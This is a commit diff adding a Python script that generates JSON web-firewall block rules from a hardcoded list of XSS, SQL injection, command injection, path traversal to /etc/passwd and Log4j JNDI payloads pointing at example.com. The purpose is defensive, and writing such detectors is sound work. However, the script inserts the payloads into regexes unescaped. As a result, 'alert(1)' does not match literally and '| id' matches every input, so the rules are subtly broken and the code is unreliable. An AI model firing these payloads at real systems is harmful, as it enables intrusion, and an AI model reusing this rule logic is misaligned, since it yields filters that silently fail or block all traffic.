Create get_vulnerability_rules.py

2025-12-23 22:27:46 -05:00 · 2025-01-13 12:46:57 +01:00
parent 52ec2640e0
commit 2c62bf873f
1 changed files with 76 additions and 0 deletions
--- a/get_vulnerability_rules.py
+++ b/get_vulnerability_rules.py
@@ -0,0 +1,76 @@
+import json
+import logging
+
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+
+def generate_vulnerability_rules(output_path):
+    """Generates rules from a predefined list of vulnerability payloads."""
+    all_rules = []
+    payloads = {
+      "xss": {
+          "patterns": [
+               "<script>alert(1)</script>",
+               "<img src=x onerror=alert(1)>",
+               "javascript:alert(1)",
+               "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" #base64 encoded script tag
+          ],
+          "targets": ["ARGS", "BODY", "HEADERS"]
+      },
+      "sqli": {
+          "patterns": [
+               "1' OR '1'='1",
+               "'; SELECT * FROM users;",
+               "\" OR \"1\"=\"1",
+               "UNION SELECT 1,2,3;"
+           ],
+          "targets": ["ARGS", "BODY", "HEADERS"]
+      },
+      "rce": {
+          "patterns": [
+                "`whoami`",
+                "$(whoami)",
+                "; ls -la;",
+                "| id"
+          ],
+           "targets": ["ARGS", "HEADERS"]
+      },
+       "lfi":{
+          "patterns":[
+            "../etc/passwd",
+            "../../../../etc/passwd"
+          ],
+           "targets":["URI"]
+      },
+      "log4j": {
+            "patterns": [
+                "${jndi:ldap://example.com/a}",
+                "${jndi:rmi://example.com/b}",
+                "${jndi:dns://example.com/c}"
+            ],
+            "targets": ["ARGS", "BODY", "HEADERS"]
+        },
+    }
+
+    rule_counter = 0
+    for vuln_type, data in payloads.items():
+      for pattern in data["patterns"]:
+        rule = {
+            "id": f"{vuln_type}-{rule_counter}",
+            "phase": 2,
+            "pattern": f"(?i){pattern}",
+            "targets": data["targets"],
+            "severity": "HIGH",
+            "action": "block",
+            "score": 7,
+            "description": f"Detects {vuln_type} attack payload: {pattern}"
+        }
+        all_rules.append(rule)
+        rule_counter += 1
+    logging.info(f"Generated {len(all_rules)} rules from vulnerability payloads.")
+    with open(output_path, 'w') as f:
+         json.dump(all_rules, f, indent=2)
+    logging.info(f"Saved {len(all_rules)} rules to {output_path}")
+
+if __name__ == "__main__":
+    output_path = "vulnerability_rules.json"
+    generate_vulnerability_rules(output_path)